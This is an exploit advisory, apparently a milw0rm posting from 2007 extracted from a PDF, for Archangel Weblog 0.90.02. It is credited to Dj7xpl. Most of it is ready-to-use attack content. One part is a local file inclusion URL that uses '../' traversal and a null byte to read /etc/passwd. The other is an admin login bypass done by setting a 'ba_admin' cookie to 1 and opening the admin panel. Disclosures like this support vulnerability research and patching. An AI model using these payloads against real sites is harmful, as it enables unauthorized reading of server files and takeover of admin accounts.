Archangel Weblog 0.90.02 Local File Inclusion Admin Bypass Vulns.pdf

1 \\\|/// 2 \\ − − // 3 ( @ @ ) 4 −−−−oOOo−−(_)−oOOo−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 5 Portal : Archangel Weblog version 0.90.02 6 Home : http://www.archangelmgt.com/weblog.shtml 7 Download : http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip 8 Author : Dj7xpl / Dj7xpl@2600.ir 9 HomePage : http://Dj7xpl.2600.ir 10 Type : Local File Inclusion & Login Page Bypass By Cookie 11 −−−−ooooO−−−−−Ooooo−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 12 ( ) ( ) 13 \ ( ) / 14 \_) (_/ 15 16 17 18 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ 19 20 Local File Include : 21 22 http://[TARGET]/[PATH]/index.php?index=[Local File]%00 23 http://Target.com/blog/index.php?index=../../../../etc/passwd%00 24 25 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ 26 27 28 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ 29 30 Edit Cookie : 31 32 Host : Target 33 Name : ba_admin 34 Value : 1 <−−−−−− (Admin User Id) 35 36 And Go To Admin Panel : 37 38 http://[Target]/[Path]/Admin/ 39 40 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+ 41 42 # milw0rm.com [2007−05−05] Page 1/1 Archangel Weblog 0.90.02 Local File Inclusion Admin Bypass Vulns Dj7xpl 05/05/2007